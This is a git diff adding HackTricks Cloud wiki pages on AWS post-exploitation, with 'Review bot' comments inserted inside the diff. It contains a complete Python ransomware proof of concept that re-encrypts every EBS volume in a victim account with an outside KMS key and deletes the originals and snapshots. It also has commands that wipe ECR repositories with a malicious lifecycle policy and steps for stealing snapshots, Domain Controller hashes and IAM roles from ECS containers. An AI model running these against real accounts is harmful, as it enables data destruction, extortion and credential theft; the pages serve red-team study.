+ +![Pasted image 20231231174131](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/ba9e5340-7020-4af9-95cc-0e02267ced47) ![Pasted image 20231231174258](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/6c3215ec-4161-44e2-b1c1-e32f43ad0fa4) + +But when you attempt to actually start the EC2 instance back up with the encrypted EBS volume it'll just fail and go from the 'pending' state back to the 'stopped' state forever since the attached EBS volume can't be decrypted using the key since the key policy no longer allows it. + +![Pasted image 20231231174322](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/73456c22-0828-4da9-a737-e4d90fa3f514) ![Pasted image 20231231174352](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4d83a90e-6fa9-4003-b904-a4ba7f5944d0) + +This the python script used. It takes AWS creds for a 'victim' account and a publicly available AWS ARN value for the key to be used for encryption. The script will make encrypted copies of ALL available EBS volumes attached to ALL EC2 instances in the targeted AWS account, then stop every EC2 instance, detach the original EBS volumes, delete them, and finally delete all the snapshots utilized during the process. This will leave only encrypted EBS volumes in the targeted 'victim' account. ONLY USE THIS SCRIPT IN A TEST ENVIRONMENT, IT IS DESTRUCTIVE AND WILL DELETE ALL THE ORIGINAL EBS VOLUMES. You can recover them using the utilized KMS key and restore them to their original state via snapshots, but just want to make you aware that this is a ransomware PoC at the end of the day. 
+ +``` +import boto3 +import argparse +from botocore.exceptions import ClientError + +def enumerate_ec2_instances(ec2_client): + instances = ec2_client.describe_instances() + instance_volumes = {} + for reservation in instances['Reservations']: + for instance in reservation['Instances']: + instance_id = instance['InstanceId'] + volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol] + instance_volumes[instance_id] = volumes + return instance_volumes + +def snapshot_volumes(ec2_client, volumes): + snapshot_ids = [] + for volume_id in volumes: + snapshot = ec2_client.create_snapshot(VolumeId=volume_id) + snapshot_ids.append(snapshot['SnapshotId']) + return snapshot_ids + +def wait_for_snapshots(ec2_client, snapshot_ids): + for snapshot_id in snapshot_ids: + ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id]) + +def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn): + new_volume_ids = [] + for snapshot_id in snapshot_ids: + snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0] + volume_id = snapshot_info['VolumeId'] + volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0] + availability_zone = volume_info['AvailabilityZone'] + + volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone, + Encrypted=True, KmsKeyId=kms_key_arn) + new_volume_ids.append(volume['VolumeId']) + return new_volume_ids + +def stop_instances(ec2_client, instance_ids): + for instance_id in instance_ids: + try: + instance_description = ec2_client.describe_instances(InstanceIds=[instance_id]) + instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name'] + + if instance_state == 'running': + ec2_client.stop_instances(InstanceIds=[instance_id]) + print(f"Stopping instance: {instance_id}") + ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id]) + print(f"Instance {instance_id} 
stopped.") + else: + print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).") + + except ClientError as e: + print(f"Error stopping instance {instance_id}: {e}") + +def detach_and_delete_volumes(ec2_client, volumes): + for volume_id in volumes: + try: + ec2_client.detach_volume(VolumeId=volume_id) + ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id]) + ec2_client.delete_volume(VolumeId=volume_id) + print(f"Deleted volume: {volume_id}") + except ClientError as e: + print(f"Error detaching or deleting volume {volume_id}: {e}") + + +def delete_snapshots(ec2_client, snapshot_ids): + for snapshot_id in snapshot_ids: + try: + ec2_client.delete_snapshot(SnapshotId=snapshot_id) + print(f"Deleted snapshot: {snapshot_id}") + except ClientError as e: + print(f"Error deleting snapshot {snapshot_id}: {e}") + +def replace_volumes(ec2_client, instance_volumes): + instance_ids = list(instance_volumes.keys()) + stop_instances(ec2_client, instance_ids) + + all_volumes = [vol for vols in instance_volumes.values() for vol in vols] + detach_and_delete_volumes(ec2_client, all_volumes) + +def ebs_lock(access_key, secret_key, region, kms_key_arn): + ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region) + + instance_volumes = enumerate_ec2_instances(ec2_client) + all_volumes = [vol for vols in instance_volumes.values() for vol in vols] + snapshot_ids = snapshot_volumes(ec2_client, all_volumes) + wait_for_snapshots(ec2_client, snapshot_ids) + create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn) # New encrypted volumes are created but not attached + replace_volumes(ec2_client, instance_volumes) # Stops instances, detaches and deletes old volumes + delete_snapshots(ec2_client, snapshot_ids) # Optionally delete snapshots if no longer needed + +def parse_arguments(): + parser = argparse.ArgumentParser(description='EBS Volume Encryption and 
Replacement Tool') + parser.add_argument('--access-key', required=True, help='AWS Access Key ID') + parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key') + parser.add_argument('--region', required=True, help='AWS Region') + parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption') + return parser.parse_args() + +def main(): + args = parse_arguments() + ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region) + + instance_volumes = enumerate_ec2_instances(ec2_client) + all_volumes = [vol for vols in instance_volumes.values() for vol in vols] + snapshot_ids = snapshot_volumes(ec2_client, all_volumes) + wait_for_snapshots(ec2_client, snapshot_ids) + create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn) + replace_volumes(ec2_client, instance_volumes) + delete_snapshots(ec2_client, snapshot_ids) + +if __name__ == "__main__": + main() +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md new file mode 100644 index 0000000000..4c0fa0e1cb --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md @@ -0,0 +1,174 @@ +# AWS - EBS Snapshot Dump + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Checking a snapshot locally + +```bash +# Install dependencies +pip install 'dsnap[cli]' +brew install vagrant +brew install virtualbox + +# Get snapshot from image +mkdir snap_wordir; cd snap_workdir +dsnap init +## Download a snapshot of the volume of that instance +## If no snapshot existed it will try to create one +dsnap get +dsnap --profile default --region eu-west-1 get i-0d706e33814c1ef9a +## Other way to get a snapshot +dsnap list #List snapshots +dsnap get snap-0dbb0347f47e38b96 #Download snapshot directly + +# Run with vagrant +IMAGE=".img" vagrant up #Run image with vagrant+virtuabox +IMAGE=".img" vagrant ssh #Access the VM +vagrant destroy #To destoy + +# Run with docker +git clone https://github.com/RhinoSecurityLabs/dsnap.git +cd dsnap +make docker/build +IMAGE=".img" make docker/run #With the snapshot downloaded +``` + +{% hint style="danger" %} +**Note** that `dsnap` will not allow you to download public snapshots. To circumvent this, you can make a copy of the snapshot in your personal account, and download that: +{% endhint %} + +{% code overflow="wrap" %} +```bash +# Copy the snapshot +aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57" + +# View the snapshot info +aws ec2 describe-snapshots --owner-ids self --region us-east-2 + +# Download the snapshot. 
The ID is the copy from your account +dsnap --region us-east-2 get snap-027da41be451109da + +# Delete the snapshot after downloading +aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2 +``` +{% endcode %} + +For more info on this technique check the original research in [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/) + +You can do this with Pacu using the module [ebs\_\_download\_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots) + +## Checking a snapshot in AWS + +{% code overflow="wrap" %} +```bash +aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89 +``` +{% endcode %} + +**Mount it in a EC2 VM under your control** (it has to be in the same region as the copy of the backup): + +Step 1: A new volume of your preferred size and type is to be created by heading over to EC2 –> Volumes. + +To be able to perform this action, follow these commands: + +* Create an EBS volume to attach to the EC2 instance. +* Ensure that the EBS volume and the instance are in the same zone. + +Step 2: The "attach volume" option is to be selected by right-clicking on the created volume. + +Step 3: The instance from the instance text box is to be selected. + +To be able to perform this action, use the following command: + +* Attach the EBS volume. + +Step 4: Login to the EC2 instance and list the available disks using the command `lsblk`. + +Step 5: Check if the volume has any data using the command `sudo file -s /dev/xvdf`. + +If the output of the above command shows "/dev/xvdf: data", it means the volume is empty. + +Step 6: Format the volume to the ext4 filesystem using the command `sudo mkfs -t ext4 /dev/xvdf`. Alternatively, you can also use the xfs format by using the command `sudo mkfs -t xfs /dev/xvdf`. Please note that you should use either ext4 or xfs. 
+ +Step 7: Create a directory of your choice to mount the new ext4 volume. For example, you can use the name "newvolume". + +To be able to perform this action, use the command `sudo mkdir /newvolume`. + +Step 8: Mount the volume to the "newvolume" directory using the command `sudo mount /dev/xvdf /newvolume/`. + +Step 9: Change directory to the "newvolume" directory and check the disk space to validate the volume mount. + +To be able to perform this action, use the following commands: + +* Change directory to `/newvolume`. +* Check the disk space using the command `df -h .`. The output of this command should show the free space in the "newvolume" directory. + +You can do this with Pacu using the module `ebs__explore_snapshots`. + +## Checking a snapshot in AWS (using cli) + +{% code overflow="wrap" %} +```bash +aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id + +# Attach new volume to instance +aws ec2 attach-volume --device /dev/sdh --instance-id --volume-id + +# mount the snapshot from within the VM + +sudo file -s /dev/sdh +/dev/sdh: symbolic link to `xvdh' + +sudo file -s /dev/xvdh +/dev/xvdh: x86 boot sector; partition 1: ID=0xee, starthead 0, startsector 1, 16777215 sectors, extended partition table (last)\011, code offset 0x63 + +lsblk /dev/xvdh +NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT +xvdh 202:112 0 8G 0 disk +├─xvdh1 202:113 0 7.9G 0 part +├─xvdh14 202:126 0 4M 0 part +└─xvdh15 202:127 0 106M 0 part + +sudo mount /dev/xvdh1 /mnt + +ls /mnt +``` +{% endcode %} + +## Shadow Copy + +Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project. 
+ +You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot. + +## References + +* [https://devopscube.com/mount-ebs-volume-ec2-instance/](https://devopscube.com/mount-ebs-volume-ec2-instance/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md new file mode 100644 index 0000000000..51e033417d --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md @@ -0,0 +1,41 @@ +# AWS - Malicious VPC Mirror + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +**Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!** + +Passive network inspection in a cloud environment has been **challenging**, requiring major configuration changes to monitor network traffic. However, a new feature called “**VPC Traffic Mirroring**” has been introduced by AWS to simplify this process. With VPC Traffic Mirroring, network traffic within VPCs can be **duplicated** without installing any software on the instances themselves. This duplicated traffic can be sent to a network intrusion detection system (IDS) for **analysis**. + +To address the need for **automated deployment** of the necessary infrastructure for mirroring and exfiltrating VPC traffic, we have developed a proof-of-concept script called “**malmirror**”. This script can be used with **compromised AWS credentials** to set up mirroring for all supported EC2 instances in a target VPC. It is important to note that VPC Traffic Mirroring is only supported by EC2 instances powered by the AWS Nitro system, and the VPC mirror target must be within the same VPC as the mirrored hosts. + +The **impact** of malicious VPC traffic mirroring can be significant, as it allows attackers to access **sensitive information** transmitted within VPCs. The **likelihood** of such malicious mirroring is high, considering the presence of **cleartext traffic** flowing through VPCs. Many companies use cleartext protocols within their internal networks for **performance reasons**, assuming traditional man-in-the-middle attacks are not possible. + +For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), it can be found on our **GitHub repository**. 
The script automates and streamlines the process, making it **quick, simple, and repeatable** for offensive research purposes. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
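Review bot: in the VPC Traffic Mirroring file (the hunk that ends just before aws-ecr-post-exploitation.md), the paragraphs after "Check https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws" are copied in Rhino's first person ("we have developed a proof-of-concept script called malmirror", "it can be found on our GitHub repository"), so on a HackTricks page they read as if HackTricks wrote malmirror. Either put them in a blockquote attributed to the Rhino post or rewrite in third person ("Rhino Security Labs published a PoC script, malmirror, that sets up mirroring for every supported instance in a target VPC"). The two restrictions stated as current fact ("only supported by EC2 instances powered by the AWS Nitro system", "the VPC mirror target must be within the same VPC as the mirrored hosts") come from the linked post; attribute them to it or re-verify against the current VPC Traffic Mirroring docs before asserting them unconditionally.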
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md new file mode 100644 index 0000000000..3d8bb5192d --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md @@ -0,0 +1,122 @@ +# AWS - ECR Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## ECR + +For more information check + +{% content-ref url="../aws-services/aws-ecr-enum.md" %} +[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md) +{% endcontent-ref %} + +### Login, Pull & Push + +{% code overflow="wrap" %} +```bash +# Docker login into ecr +## For public repo (always use us-east-1) +aws ecr-public get-login-password --region us-east-1 | docker login --username AWS --password-stdin public.ecr.aws/ +## For private repo +aws ecr get-login-password --profile --region | docker login --username AWS --password-stdin .dkr.ecr..amazonaws.com +## If you need to acces an image from a repo if a different account, in set the account number of the other account + +# Download +docker pull .dkr.ecr..amazonaws.com/:latest +## If you still have the error "Requested image not found" +## It might be because the tag "latest" doesn't exit +## Get valid tags with: +TOKEN=$(aws --profile ecr get-authorization-token --output text --query 'authorizationData[].authorizationToken') +curl -i -H "Authorization: Basic $TOKEN" https://.dkr.ecr..amazonaws.com/v2//tags/list + +# Inspect the image +docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0 + +# Upload (example uploading purplepanda with tag latest) +docker tag purplepanda:latest .dkr.ecr..amazonaws.com/purplepanda:latest +docker push .dkr.ecr..amazonaws.com/purplepanda:latest + +# Downloading without Docker +# List digests +aws ecr batch-get-image --repository-name level2 \ + --registry-id 653711331788 \ + --image-ids imageTag=latest | jq '.images[].imageManifest | fromjson' + +## Download a digest +aws ecr get-download-url-for-layer \ + --repository-name level2 \ + --registry-id 653711331788 \ + --layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a" +``` +{% endcode %} + +After downloading the images you should **check them for sensitive info**: + +{% embed 
url="https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics" %} + +### `ecr:PutLifecyclePolicy` | `ecr:DeleteRepository` | `ecr-public:DeleteRepository` | `ecr:BatchDeleteImage` | `ecr-public:BatchDeleteImage` + +An attacker with any of these permissions can **create or modify a lifecycle policy to delete all images in the repository** and then **delete the entire ECR repository**. This would result in the loss of all container images stored in the repository. + +```bash +bashCopy code# Create a JSON file with the malicious lifecycle policy +echo '{ + "rules": [ + { + "rulePriority": 1, + "description": "Delete all images", + "selection": { + "tagStatus": "any", + "countType": "imageCountMoreThan", + "countNumber": 0 + }, + "action": { + "type": "expire" + } + } + ] +}' > malicious_policy.json + +# Apply the malicious lifecycle policy to the ECR repository +aws ecr put-lifecycle-policy --repository-name your-ecr-repo-name --lifecycle-policy-text file://malicious_policy.json + +# Delete the ECR repository +aws ecr delete-repository --repository-name your-ecr-repo-name --force + +# Delete the ECR public repository +aws ecr-public delete-repository --repository-name your-ecr-repo-name --force + +# Delete multiple images from the ECR repository +aws ecr batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0 + +# Delete multiple images from the ECR public repository +aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0 +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
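Review bot: in aws-ecr-post-exploitation.md, the sentence under the `ecr:PutLifecyclePolicy | ecr:DeleteRepository | ...` heading says an attacker "with any of these permissions" can expire all images and then delete the repository, but each permission only enables its own command: `ecr:PutLifecyclePolicy` alone expires images (and lifecycle rules are evaluated asynchronously, so nothing is removed at the moment `put-lifecycle-policy` runs), `ecr:BatchDeleteImage` alone removes the listed tags or digests, and only `ecr:DeleteRepository` removes the repository. Split the sentence per permission or say "with one or more of these permissions". Also, the first line of that code block, `bashCopy code# Create a JSON file with the malicious lifecycle policy`, carries a pasted "bashCopy code" prefix that should be deleted, and the login comment "If you need to acces an image from a repo if a different account" should read "access an image from a repo in a different account".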
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md new file mode 100644 index 0000000000..096bdaea62 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md @@ -0,0 +1,88 @@ +# AWS - ECS Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## ECS + +For more information check: + +{% content-ref url="../aws-services/aws-ecs-enum.md" %} +[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md) +{% endcontent-ref %} + +### Host IAM Roles + +In ECS an **IAM role can be assigned to the task** running inside the container. **If** the task is run inside an **EC2** instance, the **EC2 instance** will have **another IAM** role attached to it.\ +Which means that if you manage to **compromise** an ECS instance you can potentially **obtain the IAM role associated to the ECR and to the EC2 instance**. For more info about how to get those credentials check: + +{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} + +{% hint style="danger" %} +Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance. +{% endhint %} + +### Privesc to node to steal other containers creds & secrets + +But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached. + +#### Making containers run in current host + +Furthermore, the **EC2 instance role** will usually have enough **permissions** to **update the container instance state** of the EC2 instances being used as nodes inside the cluster. An attacker could modify the **state of an instance to DRAINING**, then ECS will **remove all the tasks from it** and the ones being run as **REPLICA** will be **run in a different instance,** potentially inside the **attackers instance** so he can **steal their IAM roles** and potential sensitive info from inside the container. 
+ +```bash +aws ecs update-container-instances-state \ + --cluster --status DRAINING --container-instances +``` + +The same technique can be done by **deregistering the EC2 instance from the cluster**. This is potentially less stealthy but it will **force the tasks to be run in other instances:** + +```bash +aws ecs deregister-container-instance \ + --cluster --container-instance --force +``` + +A final technique to force the re-execution of tasks is by indicating ECS that the **task or container was stopped**. There are 3 potential APIs to do this: + +```bash +# Needs: ecs:SubmitTaskStateChange +aws ecs submit-task-state-change --cluster \ + --status STOPPED --reason "anything" --containers [...] + +# Needs: ecs:SubmitContainerStateChange +aws ecs submit-container-state-change ... + +# Needs: ecs:SubmitAttachmentStateChanges +aws ecs submit-attachment-state-changes ... +``` + +### Steal sensitive info from ECR containers + +The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken` allowing it to **download images** (you could search for sensitive info in them). + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
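Review bot: in aws-ecs-post-exploitation.md under "Host IAM Roles", "obtain the IAM role associated to the ECR and to the EC2 instance" should be "to the ECS task and to the EC2 instance": ECR is the registry and has no role in this path. The IMDSv2 hint also overstates the protection: the hop limit of 1 is the default `HttpPutResponseHopLimit`, not something IMDSv2 enforcement imposes, so an instance launched with a higher hop limit, or a task running with host networking, still reaches the instance metadata from inside the container; phrase it as "if the instance keeps the default hop limit of 1". Wording: "EC2 uses docker to run ECs tasks" → "the ECS agent on the EC2 instance uses Docker to run ECS tasks", and "attackers instance" → "attacker's instance". The commands in this hunk also appear without their placeholders (`--cluster --status DRAINING --container-instances`); confirm the source still has the `<cluster>` / `<container-instance-id>` placeholders so the examples are copyable.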
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md new file mode 100644 index 0000000000..1a78c9dd21 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md @@ -0,0 +1,80 @@ +# AWS - EFS Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
